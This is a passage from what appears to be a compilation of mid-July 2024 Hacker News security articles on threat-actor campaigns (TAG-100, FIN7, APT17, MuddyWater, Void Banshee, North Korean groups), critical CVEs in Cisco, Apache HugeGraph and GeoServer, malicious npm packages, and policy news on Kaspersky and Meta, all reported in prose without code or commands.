a suspected cyber espionage campaign targeting global government and private
sector organizations.
Recorded Future's Insikt Group is tracking the activity under the temporary moniker TAG-100, noting that the adversary likely compromised organizations in at least ten countries across Africa, Asia, North America, South America, and Oceania, including two unnamed Asia-Pacific intergovernmental organizations.
Also singled out since February 2024 are diplomatic, government, semiconductor supply-chain, non-profit, and religious entities located in Cambodia, Djibouti, the Dominican Republic, Fiji, Indonesia, Netherlands, Taiwan, the U.K., the U.S., and Vietnam.
Cybersecurity
"TAG-100 employs open-source remote access capabilities and exploits various
internet-facing devices to gain initial access," the cybersecurity company said.
"The group used open-source Go backdoors Pantegana and Spark RAT
post-exploitation."
Attack chains involve the exploitation of known security flaws impacting various internet-facing products, including Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco Adaptive Security Appliances (ASA), Palo Alto Networks GlobalProtect, and Fortinet FortiGate.
The group has also been observed conducting wide-ranging reconnaissance activity aimed at internet-facing appliances belonging to organizations in at least fifteen countries, including Cuba, France, Italy, Japan, and Malaysia. This also comprised several Cuban embassies located in Bolivia, France, and the U.S.
"Beginning on April 16, 2024, TAG-100 conducted probable reconnaissance and
exploitation activity targeting Palo Alto Networks GlobalProtect appliances of
organizations, mostly based in the U.S., within the education, finance, legal,
local government, and utilities sectors," the company said.
This effort is said to have coincided with the public release of a proof-of-concept (PoC) exploit for CVE-2024-3400 (CVSS score: 10.0), a critical remote code execution vulnerability affecting Palo Alto Networks GlobalProtect firewalls.
Successful initial access is followed by the deployment of Pantegana, Spark RAT, and Cobalt Strike Beacon on compromised hosts.
The findings illustrate how PoC exploits can be combined with open-source programs to orchestrate attacks, effectively lowering the barrier to entry for less sophisticated threat actors. Furthermore, such tradecraft enables adversaries to complicate attribution efforts and evade detection.
"The widespread targeting of internet-facing appliances is particularly attractive because it offers a foothold within the targeted network via products that often have limited visibility, logging capabilities, and support for traditional security solutions, reducing the risk of detection post-exploitation," Recorded Future said.
Meta Halts AI Use in Brazil Following Data Protection Authority's Ban
18.7.24
AI
The Hacker News
Meta has suspended the use of generative artificial intelligence (GenAI) in
Brazil after the country's data protection authority issued a preliminary ban
objecting to its new privacy policy.
The development was first reported by news agency Reuters.
The company said it has decided to suspend the tools while it is in talks with Brazil's National Data Protection Authority (ANPD) to address the agency's concerns over its use of GenAI technology.
Earlier this month, ANPD halted with immediate effect the social media giant's new privacy policy that granted the company access to users' personal data to train its GenAI systems.
The decision stems from "the imminent risk of serious and irreparable damage or difficult-to-repair damage to the fundamental rights of the affected data subjects," the agency said.
It further set a daily fine of 50,000 reais (about $9,100 as of July 18) in case of non-compliance. Last week, it gave Meta "five more days to prove compliance with the decision."
In response, Meta said it was "disappointed" by ANPD's decision and that the move constitutes "a step backwards for innovation, competition in AI development and further delays bringing the benefits of AI to people in Brazil."
The use of personal data to train AI systems without their express consent or knowledge has raised privacy concerns, forcing U.S.-based tech giants to pause the rollout of their tools in regions with stricter data privacy laws, such as the European Union.
The Human Rights Watch reported in June how personal photos of Brazilian children have found their way to image caption datasets like LAION-5B, exposing them to further exploitation and harm through the facilitation of malicious deepfakes.
Apple, which announced a new AI system called Apple Intelligence last month, has said it won't be bringing the features to Europe this year due to the prevailing regulatory concerns arising from the Digital Markets Act (DMA).
"We are concerned that the interoperability requirements of the DMA could force us to compromise the integrity of our products in ways that risk user privacy and data security," Apple was quoted as saying to The Wall Street Journal.
Meta has since confirmed to Axios that it will also be withholding its upcoming multimodal AI models from customers in the region because of the "unpredictable nature of the European regulatory environment."
Cisco Warns of Critical Flaw
Affecting On-Prem Smart Software Manager
18.7.24
Vulnerebility
The Hacker News
Cisco has released patches to address a maximum-severity security flaw impacting
Smart Software Manager On-Prem (Cisco SSM On-Prem) that could enable a remote,
unauthenticated attacker to change the password of any users, including those
belonging to administrative users.
The vulnerability, tracked as CVE-2024-20419, carries a CVSS score of 10.0.
"This vulnerability is due to improper implementation of the password-change process," the company said in an advisory. "An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user."
The shortcoming affects Cisco SSM On-Prem versions 8-202206 and earlier. It has been fixed in version 8-202212. It's worth noting that version 9 is not susceptible to the flaw.
Cisco said there are no workarounds that resolve the issue, and that it's not aware of any malicious exploitation in the wild. Security researcher Mohammed Adel has been credited with discovering and reporting the bug.
Also fixed by the networking equipment maker is another critical file write vulnerability in Secure Email Gateway (CVE-2024-20401, CVSS score: 9.8) that lets attackers add new users with root privileges and permanently crash the appliances using emails with malicious attachments.
"An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device," it noted. "A successful exploit could allow the attacker to replace any file on the underlying file system."
"The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial-of-service (DoS) condition on the affected device."
The flaw affects SEG devices if it is running a vulnerable release of Cisco AsyncOS and if the following prerequisites are met -
The file analysis feature (part of Cisco Advanced Malware Protection) or the
content filter feature is enabled and assigned to an incoming mail policy
The Content Scanner Tools version is earlier than 23.3.0.4823
A patch for CVE-2024-20401 is available via Content Scanner Tools package
versions 23.3.0.4823 and later, which is included by default in Cisco AsyncOS
for Cisco Secure Email Software releases 15.5.1-055 and later.
CISA Adds 3 Flaws to KEV Catalog#
The disclosure comes as the U.S. Cybersecurity and Infrastructure Security
Agency (CISA) added three vulnerabilities to its Known Exploited Vulnerabilities
(KEV) catalog, based on evidence of active exploitation -
CVE-2024-34102 (CVSS score: 9.8) - Adobe Commerce and Magento Open Source
Improper Restriction of XML External Entity Reference (XXE) Vulnerability
CVE-2024-28995 (CVSS score: 8.6) - SolarWinds Serv-U Path Traversal
Vulnerability
CVE-2022-22948 (CVSS score: 6.5) - VMware vCenter Server Incorrect Default File
Permissions Vulnerability
CVE-2024-34102, which is also referred to as CosmicSting, is a severe security
flaw arising from improper handling of nested deserialization, allowing
attackers to achieve remote code execution. A proof-of-concept (PoC) exploit for
the flaw was released by Assetnote late last month.
Reports about the exploitation of CVE-2024-28995, a directory transversal vulnerability that could enable access to sensitive files on the host machine, were detailed by GreyNoise, including attempts to read files such as /etc/passwd.
The abuse of CVE-2022-22948, on the other hand, has been attributed by Google-owned Mandiant to a China-nexus cyber espionage group known as UNC3886, which has a history of leveraging zero-day flaws in Fortinet, Ivanti, and VMware appliances.
Federal agencies are required to apply mitigations per vendor instructions by August 7, 2024, to secure their networks against active threats.
North Korean Hackers Update
BeaverTail Malware to Target MacOS Users
18.7.24
APT
The Hacker News
Cybersecurity researchers have discovered an updated variant of a known stealer
malware that attackers affiliated with the Democratic People's Republic of Korea
(DPRK) have delivered as part of prior cyber espionage campaigns targeting job
seekers.
The artifact in question is an Apple macOS disk image (DMG) file named "MiroTalk.dmg" that mimics the legitimate video call service of the same name, but, in reality, serves as a conduit to deliver a native version of BeaverTail, security researcher Patrick Wardle said.
BeaverTail refers to a JavaScript stealer malware that was first documented by Palo Alto Networks Unit 42 in November 2023 as part of a campaign dubbed Contagious Interview that aims to infect software developers with malware through a supposed job interview process. Securonix is tracking the same activity under the moniker DEV#POPPER.
Besides siphoning sensitive information from web browsers and crypto wallets, the malware is capable of delivering additional payloads like InvisibleFerret, a Python backdoor that's responsible for downloading AnyDesk for persistent remote access.
While BeaverTail has been distributed via bogus npm packages hosted on GitHub and the npm package registry, the latest findings mark a shift in the distribution vector.
"If I had to guess, the DPRK hackers likely approached their potential victims, requesting that they join a hiring meeting, by downloading and executing the (infected version of) MiroTalk hosted on mirotalk[.]net," Wardle said.
An analysis of the unsigned DMG file reveals that it facilitates the theft of data from cryptocurrency wallets, iCloud Keychain, and web browsers like Google Chrome, Brave, and Opera. Furthermore, it's designed to download and execute additional Python scripts from a remote server (i.e., InvisibleFerret).
"The North Korean hackers are a wily bunch and are quite adept at hacking macOS targets, even though their technique often rely on social engineering (and thus from a technical point of view are rather unimpressive)," Wardle said.
The disclosure comes as Phylum uncovered a new malicious npm package named call-blockflow that's virtually identical to the legitimate call-bind library but incorporates complex functionality to download a remote binary file while taking painstaking efforts to fly under the radar.
"In this attack, while the call-bind package has not been compromised, the weaponized call-blockflow package copies all the trust and legitimacy of the original to bolster the attack's success," it said in a statement shared with The Hacker News.
The package, suspected to be the work of the North Korea-linked Lazarus Group and unpublished about an hour and a half later after it was uploaded to npm, attracted a total of 18 downloads. Evidence suggests that the activity, comprising over three dozen malicious packages, has been underway in waves since September 2023.
"These packages, once installed, would download a remote file, decrypt it, execute an exported function from it, and then meticulously cover their tracks by deleting and renaming files," the software supply chain security company said. "This left the package directory in a seemingly benign state after installation."
It also follows an advisory from JPCERT/CC, warning of cyber attacks orchestrated by the North Korean Kimsuky actor targeting Japanese organizations.
The infection process starts with phishing messages impersonating security and diplomatic organizations, and contain a malicious executable that, upon opening, leads to the download of a Visual Basic Script (VBS), which, in turn, retrieves a PowerShell script to harvest user account, system and network information as well as enumerate files and processes.
The collected information is then exfiltrated to a command-and-control (C2) server, which responds back with a second VBS file that's then executed to fetch and run a PowerShell-based keylogger named InfoKey.
"Although there have been few reports of attack activities by Kimsuky targeting organizations in Japan, there is a possibility that Japan is also being actively targeted," JPCERT/CC said.
FIN7 Group Advertises Security-Bypassing Tool on Dark Web Forums
17.7.24
APT
The Hacker News
The financially motivated threat actor known as FIN7 has been observed using
multiple pseudonyms across several underground forums to likely advertise a tool
known to be used by ransomware groups like Black Basta.
"AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple ransomware groups," cybersecurity company SentinelOne said in a report shared with The Hacker News.
FIN7, an e-crime group of Russian and Ukrainian origin, has been a persistent threat since at least 2012, shifting gears from its initial targeting of point-of-sale (PoS) terminals to acting as a ransomware affiliate for now-defunct gangs such as REvil and Conti, before launching its own ransomware-as-a-service (RaaS) programs DarkSide and BlackMatter.
The threat actor, which is also tracked under the names Carbanak, Carbon Spider, Gold Niagara, and Sangria Tempest (formerly Elbrus), has a track record of setting up front companies like Combi Security and Bastion Secure to recruit unwitting software engineers into ransomware schemes under the pretext of penetration testing.
Over the years, FIN7 has demonstrated a high level of adaptability, sophistication, and technical expertise by retooling its malware arsenal – POWERTRASH, DICELOADER (aka IceBot, Lizar, or Tirion), and a penetration testing tool called Core Impact that's delivered via the POWERTRASH loader – notwithstanding the arrests and sentencing of some of its members.
This is evidenced in the large-scale phishing campaigns undertaken by the group to deliver ransomware and other malware families by deploying thousands of "shell" domains that mimic legitimate media and technology businesses, according to a recent report from Silent Push.
Alternately, these shell domains have been occasionally used in a conventional redirect chain to send users to spoofed login pages that masquerade as property management portals.
These typosquat versions are advertised on search engines like Google, tricking users searching for popular software into downloading a malware-laced variant instead. Some of the tools targeted include 7-Zip, PuTTY, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
It's worth noting that FIN7's use of malvertising tactics was previously highlighted by both eSentire and Malwarebytes in May 2024, with the attack chains leading to the deployment of NetSupport RAT.
"FIN7 rents a large amount of dedicated IPs on a number of hosts, but primarily on Stark Industries, a popular bulletproof hosting provider that has been linked to DDoS attacks in Ukraine and across Europe," Silent Push noted.
The latest findings from SentinelOne show that FIN7 has not only used several personas on cybercrime forums to promote the sale of AvNeutralizer, but has also improvised the tool with new capabilities.
This is based on the fact that multiple ransomware groups began to use updated versions of the EDR impairment program as of January 2023, which was exclusively put to use by the Black Basta group until then.
SentinelLabs researcher Antonio Cocomazzi told The Hacker News that the advertisement of AvNeutralizer on underground forums shouldn't be treated as a new malware-as-a-service (MaaS) tactic adopted by FIN7 without additional evidence.
"FIN7 has a history of developing and using sophisticated tools for their own operations," Cocomazzi said. "However, selling tools to other cybercriminals could be seen as a natural evolution of their methods to diversify and generate additional revenue."
"Historically, FIN7 has used underground marketplaces to generate revenue. For example, the DoJ reported that since 2015, FIN7 successfully stole data for more than 16 million payment cards, many of which were sold on underground marketplaces. While this was more common in the pre-ransomware era, the current advertisement of AvNeutralizer could signal a shift or expansion in their strategy."
"This could be motivated by the increasing protections provided by nowadays EDR solutions compared to previous AV systems. As these defenses have improved, the demand for impairment tools like AvNeutralizer has grown significantly especially among ransomware operators. Attackers now face tougher challenges in bypassing these protections, making such tools highly valuable and expensive."
For its part, the updated version of AvNeutralizer employs anti-analysis techniques and, most importantly, leverages a Windows built-in driver called "ProcLaunchMon.sys" in conjunction with the Process Explorer driver to tamper with the functioning of security solutions and evade detection. The tool is believed to have been in active development since April 2022.
A similar version of this approach has also been put to use by the Lazarus Group, making it even more dangerous as it goes beyond a traditional Bring Your Own Vulnerable Driver (BYOVD) attack by weaponizing a susceptible driver already present by default in Windows machines.
Another noteworthy update concerns FIN7's Checkmarks platform, which has been modified to include an automated SQL injection attack module for exploiting public-facing applications.
"In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through automated SQL injection attacks," SentinelOne said. "Additionally, its development and commercialization of specialized tools like AvNeutralizer within criminal underground forums significantly enhance the group's impact."
China-linked APT17 Targets Italian Companies with 9002 RAT Malware
17.7.24
APT
The Hacker News
A China-linked threat actor called APT17 has been observed targeting Italian
companies and government entities using a variant of a known malware referred to
as 9002 RAT.
The two targeted attacks took place on June 24 and July 2, 2024, Italian cybersecurity company TG Soft said in an analysis published last week.
"The first campaign on June 24, 2024 used an Office document, while the second campaign contained a link," the company noted. "Both campaigns invited the victim to install a Skype for Business package from a link of an Italian government-like domain to convey a variant of 9002 RAT."
APT17 was first documented by Google-owned Mandiant (then FireEye) in 2013 as part of cyber espionage operations called DeputyDog and Ephemeral Hydra that leveraged zero-day flaws in Microsoft's Internet Explorer to breach targets of interest.
It's also known by the monikers Aurora Panda, Bronze Keystone, Dogfish, Elderwood, Helium, Hidden Lynx, and TEMP.Avengers, with the adversary sharing some level of tooling overlap with another threat actor dubbed Webworm.
9002 RAT, aka Hydraq and McRAT, achieved notoriety as the cyber weapon of choice in Operation Aurora that singled out Google and other large companies in 2009. It was also subsequently put to use in another 2013 campaign named Sunshop in which the attackers injected malicious redirects into several websites.
The latest attack chains entail the use of spear-phishing lures to trick recipients into clicking on a link that urges them to download an MSI installer for Skype for Business ("SkypeMeeting.msi").
Launching the MSI package triggers the execution of a Java archive (JAR) file via a Visual Basic Script (VBS), while also installing the legitimate chat software on the Windows system. The Java application, in turn, decrypts and executes the shellcode responsible for launching 9002 RAT.
A modular trojan, 9002 RAT comes with features to monitor network traffic, capture screenshots, enumerate files, manage processes, and run additional commands received from a remote server to facilitate network discovery, among others.
"The malware appears to be constantly updated with diskless variants as well," TG Soft said. "It is composed of various modules that are activated as needed by the cyber actor so as to reduce the possibility of interception."
Scattered Spider Adopts RansomHub
and Qilin Ransomware for Cyber Attacks
17.7.24
Ransom
The Hacker News
The infamous cybercrime group known as Scattered Spider has incorporated
ransomware strains such as RansomHub and Qilin into its arsenal, Microsoft has
revealed.
Scattered Spider is the designation given to a threat actor that's known for its sophisticated social engineering schemes to breach targets and establish persistence for follow-on exploitation and data theft. It also has a history of targeting VMWare ESXi servers and deploying BlackCat ransomware.
It shares overlaps with activity clusters tracked by the broader cybersecurity community under the monikers 0ktapus, Octo Tempest, and UNC3944. Last month, it was reported that a key member of the group was arrested in Spain.
RansomHub, which arrived on the scene earlier this February, has been assessed to be a rebrand of another ransomware strain called Knight, according to an analysis from Broadcom-owned Symantec last month.
"RansomHub is a ransomware-as-a-service (RaaS) payload used by more and more threat actors, including ones that have historically used other (sometimes defunct) ransomware payloads (like BlackCat), making it one of the most widespread ransomware families today," Microsoft said.
The Windows maker said it also observed RansomHub being deployed as part of post-compromise activity by Manatee Tempest (aka DEV-0243, Evil Corp, or Indrik Spider) following initial access obtained by Mustard Tempest (aka DEV-0206 or Purple Vallhund) through FakeUpdates (aka Socgholish) infections.
It's worth mentioning here that Mustard Tempest is an initial access broker that has, in the past, utilized FakeUpdates in attacks that have led to actions resembling pre-ransomware behavior associated with Evil Corp. These intrusions were also notable for the fact that FakeUpdates was delivered via existing Raspberry Robin infections.
The development comes amid the emergence of fresh ransomware families like FakePenny (attributed to Moonstone Sleet), Fog (distributed by Storm-0844, which has also propagated Akira), and ShadowRoot, the last of which has been observed targeting Turkish businesses using fake PDF invoices.
"As the threat of ransomware continues to increase, expand, and evolve, users and organizations are advised to follow security best practices, especially credential hygiene, principle of least privilege, and Zero Trust," Microsoft said.
Critical Apache HugeGraph
Vulnerability Under Attack - Patch ASAP
17.7.24
Vulnerebility
The Hacker News
Threat actors are actively exploiting a recently disclosed critical security
flaw impacting Apache HugeGraph-Server that could lead to remote code execution
attacks.
Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API.
"Users are recommended to upgrade to version 1.3.0 with Java11 and enable the Auth system, which fixes the issue," the Apache Software Foundation noted in late April 2024. "Also you could enable the 'Whitelist-IP/port' function to improve the security of RESTful-API execution."
Additional technical specifics about the flaw were released by penetration testing company SecureLayer7 in early June, stating it enables an attacker to bypass sandbox restrictions and achieve code execution, giving them complete control over a susceptible server.
This week, the Shadowserver Foundation said it spotted in-the-wild exploitation attempts that leverage the flaw, making it imperative that users move quickly to apply the latest fixes.
"We are observing Apache HugeGraph-Server CVE-2024-27348 RCE 'POST /gremlin' exploitation attempts from multiple sources," it said. "[Proof-of-concept] code is public since early June. If you run HugeGraph, make sure to update."
Vulnerabilities discovered in Apache projects have been lucrative attack vectors for the nation-state and financially motivated threat actors in recent years, with flaws in Log4j, ActiveMQ, and RocketMQ coming under heavy exploitation to infiltrate target environments.
'Konfety' Ad Fraud Uses 250+ Google Play Decoy Apps to Hide Malicious Twins
16.7.24
Virus
The Hacker News
Details have emerged about a "massive ad fraud operation" that leverages hundreds of apps on the Google Play Store to perform a host of nefarious activities.
The campaign has been codenamed Konfety – the Russian word for Candy – owing to its abuse of a mobile advertising software development kit (SDK) associated with a Russia-based ad network called CaramelAds.
"Konfety represents a new form of fraud and obfuscation, in which threat actors operate 'evil twin' versions of 'decoy twin' apps available on major marketplaces," HUMAN's Satori Threat Intelligence Team said in a technical report shared with The Hacker News.
While the decoy apps, totaling more than 250 in number, are harmless and distributed via the Google Play Store, their respective "evil twins" are disseminated through a malvertising campaign designed to facilitate ad fraud, monitor web searches, install browser extensions, and sideload APK files code onto users' devices.
The most unusual aspect of the campaign is that the evil twin masquerades as the decoy twin by spoofing the latter's app ID and advertising publisher IDs for rendering ads. Both the decoy and evil twin sets of apps operate on the same infrastructure, allowing the threat actors to exponentially scale their operations as required.
That having said, not only do the decoy apps behave normally, a majority of them do not even render ads. They also incorporate a GDPR consent notice.
"This 'decoy/evil twin' mechanism for obfuscation is a novel way for threat actors to represent fraudulent traffic as legitimate," HUMAN researchers said. "At its peak, Konfety-related programmatic volume reached 10 billion requests per day."
Put differently, Konfety takes advantage of the SDK's ad rendering capabilities to commit ad fraud by making it a lot more challenging to distinguish malicious traffic from legitimate traffic.
The Konfety evil twin apps are said to be propagated via a
malvertising campaign promoting APK mods and other software like Letasoft Sound
Booster, with the booby-trapped URLs hosted on attacker-controlled domains,
compromised WordPress sites, and other platforms that allow content uploads,
including Docker Hub, Facebook, Google Sites, and OpenSea.
Users who end up clicking on these URLs are redirected to a domain that tricks
them into downloading the malicious evil twin app, which, in turn, acts as a
dropper for a first-stage that's decrypted from the assets of the APK file and
is used to set up command-and-control (C2) communications.
The initial stager further attempts to hide the app's icon from the device's home screen and runs a second-stage DEX payload that performs fraud by serving out-of-context, full-screen video ads when the user is either on their home screen or using another app.
"The crux of the Konfety operation lies in the evil twin apps," the researchers said. "These apps mimic their corresponding decoy twin apps by copying their app ID/package names and publisher IDs from the decoy twin apps."
"The network traffic derived from the evil twin applications is functionally identical to network traffic derived from the decoy twin applications; the ad impressions rendered by the evil twins use the package name of the decoy twins in the request."
Other capabilities of the malware include weaponizing the CaramelAds SDK to visit websites using the default web browser, luring users by sending notifications that prompt them into clicking on the bogus links, or sideloading modified versions of other advertising SDKs.
That's not all. Users installing the Evil Twins apps are urged to add a search toolbar widget to the device home screen, which surreptitiously monitors their searches by sending the data to domains named vptrackme[.]com and youaresearching[.]com.
"Threat actors understand that hosting malicious apps on stores is not a stable technique, and are finding creative and clever ways to evade detection and commit sustainable long term fraud," the researchers concluded. "Actors setting up mediation SDK companies and spreading the SDK to abuse high-quality publishers is a growing technique."
Malicious npm Packages Found Using
Image Files to Hide Backdoor Code
16.7.24
Virus
The Hacker News
Cybersecurity researchers have identified two malicious packages on the npm
package registry that concealed backdoor code to execute malicious commands sent
from a remote server.
The packages in question – img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy – have been downloaded 190 and 48 times each. As of writing, they have been taken down by the npm security team.
"They contained sophisticated command and control functionality hidden in image files that would be executed during package installation," software supply chain security firm Phylum said in an analysis.
The packages are designed to impersonate a legitimate npm library called aws-s3-object-multipart-copy, but come with an altered version of the "index.js" file to execute a JavaScript file ("loadformat.js").
For its part, the JavaScript file is designed to process three images -- that feature the corporate logos for Intel, Microsoft, and AMD -- with the image corresponding to Microsoft's logo used to extract and execute the malicious content.
The code works by registering the new client with a command-and-control (C2) server by sending the hostname and operating system details. It then attempts to execute attacker-issued commands periodically every five seconds.
In the final stage, the output of the commands' execution is exfiltrated back to the attacker via a specific endpoint.
"In the last few years, we've seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems," Phylum said.
"Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume."
Iranian Hackers Deploy New BugSleep
Backdoor in Middle East Cyber Attacks
16.7.24
APT
The Hacker News
The Iranian nation-state actor known as MuddyWater has been observed using a
never-before-seen backdoor as part of a recent attack campaign, shifting away
from its well-known tactic of deploying legitimate remote monitoring and
management (RMM) software for maintaining persistent access.
That's according to independent findings from cybersecurity firms Check Point and Sekoia, which have codenamed the malware strain BugSleep and MuddyRot, respectively.
"Compared to previous campaigns, this time MuddyWater changed their infection chain and did not rely on the legitimate Atera remote monitoring and management tool (RRM) as a validator," Sekoia said in a report shared with The Hacker News. "Instead, we observed that they used a new and undocumented implant."
Some elements of the campaign were first shared by Israeli cybersecurity company ClearSky on June 9, 2024. Targets include countries like Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal.
MuddyWater (aka Boggy Serpens, Mango Sandstorm, and TA450) is a state-sponsored threat actor that's assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS).
Cyber attacks mounted by the group have been fairly consistent, leveraging spear-phishing lures in email messages to deliver various RMM tools like Atera Agent, RemoteUtilities, ScreenConnect, SimpleHelp, and Syncro.
Earlier this April, HarfangLab said it noticed an uptick in MuddyWater campaigns delivering Atera Agent since late October 2023 to businesses across Israel, India, Algeria, Turkey, Italy, and Egypt. The sectors targeted include airlines, IT companies, telecoms, pharma, automotive manufacturing, logistics, travel, and tourism.
"MuddyWater places a high priority on gaining access to business email accounts as part of their ongoing attack campaigns," the French cybersecurity firm noted at the time.
"These compromised accounts serve as valuable resources, enabling the group to
enhance the credibility and effectiveness of their spear-phishing efforts,
establish persistence within targeted organizations, and evade detection by
blending in with legitimate network traffic."
The latest attack chains are no different in that compromised email accounts belonging to legitimate companies are used to send spear-phishing messages that either contain a direct link or a PDF attachment pointing to an Egnyte subdomain, which has been previously abused by the threat actor to propagate Atera Agent.
BugSleep, aka MuddyRot, is an x64 implant developed in C that comes equipped with capabilities to download/upload arbitrary files to/from the compromised host, launch a reverse shell, and set up persistence. Communications with a command-and-control (C2) server take place over a raw TCP socket on port 443.
"The first message to be sent to the C2 is the victim host fingerprint, which is the combination of the hostname and the username joined by a slash," Sekoia said. "If the victim received '-1,' the program stops, otherwise the malware enters in an infinite loop to await new order from the C2."
It's currently not clear why MuddyWater has switched to using a bespoke implant, although it's suspected that the increased monitoring of RMM tools by security vendors may have played a part.
"The increased activity of MuddyWater in the Middle East, particularly in Israel, highlights the persistent nature of these threat actors, who continue to operate against a wide variety of targets in the region," Check Point said.
"Their consistent use of phishing campaigns, now incorporating a custom backdoor, BugSleep, marks a notable development in their techniques, tactics, and procedures (TTPs)."
Void Banshee APT Exploits Microsoft
MHTML Flaw to Spread Atlantida Stealer
16.7.24
APT
The Hacker News
An advanced persistent threat (APT) group called Void Banshee has been observed
exploiting a recently disclosed security flaw in the Microsoft MHTML browser
engine as a zero-day to deliver an information stealer called Atlantida.
Cybersecurity firm Trend Micro, which observed the activity in mid-May 2024, the vulnerability – tracked as CVE-2024-38112 – was used as part of a multi-stage attack chain using specially crafted internet shortcut (URL) files.
"Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains," security researchers Peter Girnus and Aliakbar Zahravi said. "The ability of APT groups like Void Banshee to exploit disabled services such as [Internet Explorer] poses a significant threat to organizations worldwide."
The findings dovetail with prior disclosures from Check Point, which told The Hacker News of a campaign leveraging the same shortcoming to distribute the stealer. It's worth noting that CVE-2024-38112 was addressed by Microsoft as part of Patch Tuesday updates last week.
CVE-2024-38112 has been described by the Windows maker as a spoofing vulnerability in the MSHTML (aka Trident) browser engine used in the now-discontinued Internet Explorer browser. However, the Zero Day Initiative (ZDI) has asserted that it's a remote code execution flaw.
"What happens when the vendor states the fix should be a defense-in-depth update rather than a full CVE?," ZDI's Dustin Childs pointed out. "What happens when the vendor states the impact is spoofing but the bug results in remote code execution?"
Attack chains involve the use of spear-phishing emails embedding links to ZIP archive files hosted on file-sharing sites, which contain URL files that exploit CVE-2024-38112 to redirect the victim to a compromised site hosting a malicious HTML Application (HTA).
Opening the HTA file results in the execution of a Visual Basic Script (VBS) that, in turn, downloads and runs a PowerShell script responsible for retrieving a .NET trojan loader, which ultimately uses the Donut shellcode project to decrypt and execute the Atlantida stealer inside RegAsm.exe process memory.
Atlantida, modeled on open-source stealers like NecroStealer and
PredatorTheStealer, is designed to extract files, screenshots, geolocation, and
sensitive data from web browsers and other applications, including Telegram,
Steam, FileZilla, and various cryptocurrency wallets.
"By using specially crafted URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process," the researchers said.
"This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks."
Not much is known about Void Banshee other than the fact that it has a history of targeting North American, European, and Southeast Asian regions for information theft and financial gain.
The development comes as Cloudflare revealed that threat actors are swiftly incorporating proof-of-concept (PoC) exploits into their arsenal, sometimes as quickly as 22 minutes after their public release, as observed in the case of CVE-2024-27198.
"The speed of exploitation of disclosed CVEs is often quicker than the speed at which humans can create WAF rules or create and deploy patches to mitigate attacks," the web infrastructure company said.
It also follows the discovery of a new campaign that leverages Facebook ads promoting fake Windows themes to distribute another stealer known as SYS01stealer that aims to hijack Facebook business accounts and further propagate the malware.
"Being an infostealer, SYS01 focuses on exfiltrating browser data such as credentials, history, and cookies," Trustwave said. "A big chunk of its payload is focused on obtaining access tokens for Facebook accounts, specifically those with Facebook business accounts, which can aid the threat actors in spreading the malware."
Kaspersky Exits U.S. Market
Following Commerce Department Ban
16.7.24
BigBrothers
The Hacker News
Russian security vendor Kaspersky has said it's exiting the U.S. market nearly a
month after the Commerce Department announced a ban on the sale of its software
in the country citing a national security risk.
News of the closure was first reported by journalist Kim Zetter.
The company is expected to wind down its U.S. operations on July 20, 2024, the same day the ban comes into effect. It's also expected to lay off less than 50 employees in the U.S.
"The company has carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable," the company said in a statement.
In late June 2024, the Commerce Department said it was enforcing a ban after what it said was an "extremely thorough investigation." The company was also added to the Entity List, preventing U.S. enterprises from conducting business with it.
It's currently not known what was uncovered as a result of the probe, but the agency said the company's continued operations in the U.S. could serve as a conduit for the Kremlin's offensive cyber capabilities.
"The manipulation of Kaspersky software, including in U.S. critical infrastructure, can cause significant risks of data theft, espionage, and system malfunction," the Bureau of Industry and Security (BIS) noted. "It can also risk the country's economic security and public health, resulting in injuries or loss of life."
Existing U.S. customers have been urged to find alternative tech solutions ahead of September 29, by which the company is expected to stop providing software and antivirus signature updates.
Kaspersky has refuted the allegations, stating it does not engage in activities that could threaten U.S. national security and that the decision was made based on the "present geopolitical climate and theoretical concerns," rather than a comprehensive evaluation of its products and services.
CISA Warns of Actively Exploited RCE
Flaw in GeoServer GeoTools Software
16.7.24
Exploit
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added
a critical security flaw impacting OSGeo GeoServer GeoTools to its Known
Exploited Vulnerabilities (KEV) catalog, based on evidence of active
exploitation.
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards.
The vulnerability, tracked as CVE-2024-36401 (CVSS score: 9.8), concerns a case of remote code execution that could be triggered through specially crafted input.
"Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions," according to an advisory released by the project maintainers earlier this month.
The shortcoming has been addressed in versions 2.23.6, 2.24.4, and 2.25.2. Security researcher Steve Ikeoka has been credited with reporting the flaw.
It's currently not clear how the vulnerability is being exploited in the wild. GeoServer noted that the issue is "confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests."
Also patched by maintainers is another critical flaw (CVE-2024-36404, CVSS score: 9.8) that could also result in RCE "if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input." It has been resolved in versions 29.6, 30.4, and 31.2.
